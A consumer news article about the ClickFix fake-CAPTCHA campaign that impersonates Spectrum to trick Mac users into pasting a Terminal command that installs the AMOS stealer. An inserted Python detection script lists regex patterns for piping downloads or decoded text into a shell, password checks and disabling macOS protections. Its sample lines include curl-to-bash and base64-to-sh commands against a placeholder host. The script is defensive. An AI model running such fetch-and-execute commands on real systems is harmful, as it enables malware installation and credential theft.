Malware targets Mac users with fake CAPTCHA and AMOS stealer


ClickFix, a social engineering tactic that has been aimed at Windows and Mac users since the beginning of 2024, continues to evolve.

Last month, I reported how attackers were using fake CAPTCHAs to get Windows users to install malware themselves.

Now, that same trick is being turned against macOS. Cybersecurity researchers have discovered a new campaign using ClickFix to deliver Atomic macOS Stealer (AMOS), a powerful information-stealing malware for Apple systems.


Illustration of a hacker at work. (Kurt “Cyberguy” Knutsson)

What is the ClickFix malware and how does it work?

Security researchers at CloudSEK have identified a new threat aimed at macOS users through impersonation and deception. The campaign uses a technique known as ClickFix to lure victims through fake online verification prompts. This time, the attackers are impersonating Spectrum, a major telecommunications provider in the United States. They use fraudulent domains that closely resemble Spectrum's real support portals. These include deceptive addresses such as Spectrum Net and Spectrum Ticket Net panel.

Visitors to these sites are shown a standard-looking CAPTCHA box asking them to verify their identity. When they do, the site shows a fake error message that says the CAPTCHA failed. Users are encouraged to click an “alternative verification” button. This silently copies a command to their clipboard. What happens next depends on the user's operating system. On macOS, the instructions guide the user to paste and execute the command in the Terminal. That command is actually a shell script designed to steal information and download malware.

The script is particularly dangerous because it uses legitimate macOS system commands. It asks for the system password, collects credentials and disables security protections. It then downloads AMOS, a known information stealer with a history of targeting Apple devices. The malware collects confidential data such as passwords, cryptocurrency wallet keys, browser autofill data and saved cookies.
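One way a defender could triage the paste-and-run step described above, for example over shell history or process command-line telemetry. This is an added example, not code from the article or from the researchers; the rule names, the regular expressions and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed rule set: one regex per behaviour the article attributes to the script
# (fetch and run remote code, handle the system password, disable protections).
RULES = {
    "download": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decode_and_run": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "password_check": re.compile(r"\bdscl\s+\S+\s+-authonly\b|\bsudo\s+-S\b"),
    "protection_tamper": re.compile(
        r"\bxattr\s+-\w*[cd]\w*\b|\bspctl\s+--master-disable\b"),
}


def classify(command):
    """Return (verdict, matched rule names) for one command line."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(command))
    # Remote content handed straight to a shell is the paste-and-run pattern.
    remote_exec = "pipe_to_shell" in hits and (
        "download" in hits or "decode_and_run" in hits)
    if remote_exec:
        return "block", hits
    # Password handling or protection changes alone deserve a human look.
    if "password_check" in hits or "protection_tamper" in hits:
        return "review", hits
    return "ok", hits


def scan(lines):
    """Keep only the lines that are not 'ok', with their verdict and hits."""
    results = [(line, *classify(line)) for line in lines]
    return [r for r in results if r[1] != "ok"]


# Constructed sample input; example.invalid is a placeholder host.
SAMPLES = [
    "curl -fsSL https://example.invalid/verify.sh | bash",
    "echo ZWNobyBoaQ== | base64 -d | sh",
    "sudo -S xattr -d com.apple.quarantine /tmp/update",
    "curl -O https://example.invalid/report.pdf",
    "ls -la ~/Downloads",
]

if __name__ == "__main__":
    for line, verdict, hits in scan(SAMPLES):
        print(f"{verdict:6} {','.join(hits):32} {line}")
```

The patterns are heuristics: a plain file download stays "ok", while anything that pipes fetched or decoded content into a shell is blocked outright.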

Researchers believe the campaign was created by Russian-speaking attackers. The clues include comments written in Russian within the malware code. Analysts also pointed out that the delivery infrastructure was poorly assembled. Mismatched instructions appeared across devices. For example, Linux users were shown Windows commands. Mac users were told to press keys that only exist on Windows machines.


Fake CAPTCHA on a Mac. (CloudSEK)


Why ClickFix attacks are so effective

ClickFix is a social engineering method that has quickly gained popularity among cybercriminals. It relies on the fact that users trust what they see and follow simple instructions. In this campaign, the attacker's goal is to make the victim execute the infection process themselves. Once the user goes ahead, the system is compromised without the need for a traditional exploit.

The researchers believe that ClickFix has been active since at least March 2024. I first reported it in June 2024, when attackers used fake error messages from Google Chrome, Microsoft Word and OneDrive to push their payloads. Victims were shown an offer of a “solution”, which copied a malicious PowerShell command to their clipboard. They were then told to paste and run it in PowerShell or through the Run dialog.

By November 2024, the method had evolved even further. A new wave of attacks targeted Google Meet users, starting with phishing emails that imitated internal meeting invitations. These emails contained links that redirected to fake landing pages designed to look as though they came from the victim’s organization.


Fake CAPTCHA on a Mac. (CloudSEK)


6 ways to protect yourself from ClickFix and similar malware

To protect yourself from the evolving threat of ClickFix malware, which continues to target users through sophisticated social engineering tactics, consider implementing these six essential security measures:

1. Be skeptical of CAPTCHA prompts: Legitimate CAPTCHA tests never require you to paste anything into the Terminal. If a website tells you to do this, it is likely to be a scam. Close the page immediately and avoid interacting with it.

2. Do not click links in unverified emails and use strong antivirus software: Many ClickFix attacks also begin with phishing emails that pose as trusted services such as Booking.com or Google Meet. Always check the sender before clicking on links. If an email seems urgent or unexpected, go directly to the company’s official website instead of clicking any link inside the email.

The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe. Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices.

3. Enable two-factor authentication: Enable two-factor authentication whenever possible. This adds an additional security layer by requiring a second form of verification, such as a code sent to your phone, in addition to your password.


4. Keep your devices updated: Regularly updating your operating system, browser and security software ensures that you have the latest patches against known vulnerabilities. Cybercriminals exploit outdated systems, so enabling automatic updates is a simple but effective way to stay protected.

5. Monitor your accounts for suspicious activity and change your passwords: If you have interacted with a suspicious website, a phishing email or a fake login page, check your online accounts for any unusual activity. Look for unexpected login attempts, unauthorized password resets or financial transactions that you do not recognize. If something seems off, change your passwords immediately and report the activity to the relevant service provider. In addition, consider using a password manager to generate and store complex passwords. Get more details about my best expert-reviewed password managers of 2025 here.

6. Invest in a personal data removal service: Consider using a service that monitors your personal information and alerts you to possible breaches or unauthorized use of your data. These services can provide early warning signs of identity theft or other malicious activity resulting from ClickFix or similar attacks. While no service promises to remove all your data from the internet, having a removal service is great if you want to constantly monitor and automate the process of removing your information from hundreds of sites continuously over a longer period of time. See my top picks for data removal services here.


Kurt's key takeaway

Even experienced users can be deceived when malicious behavior is disguised as routine. The attack not only exploited a vulnerability in macOS, but also your familiarity with verification flows. As long as security instructions seem part of the usual experience, people will continue to execute malicious code themselves. Mac users, like everyone else, need to treat each familiar-looking interface with a little more skepticism, especially when it requests your password.


Do you think tech companies are doing enough to stop malware like ClickFix? Let us know at Cyberguy.com/contact.


Copyright 2025 Cyberguy.com. All rights reserved.

Kurt “Cyberguy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better, with his contributions for News & News Business starting mornings on “News & Friends”. Do you have a tech question? Get Kurt’s free newsletter, share your voice, a story idea or a comment at Cyberguy.com.
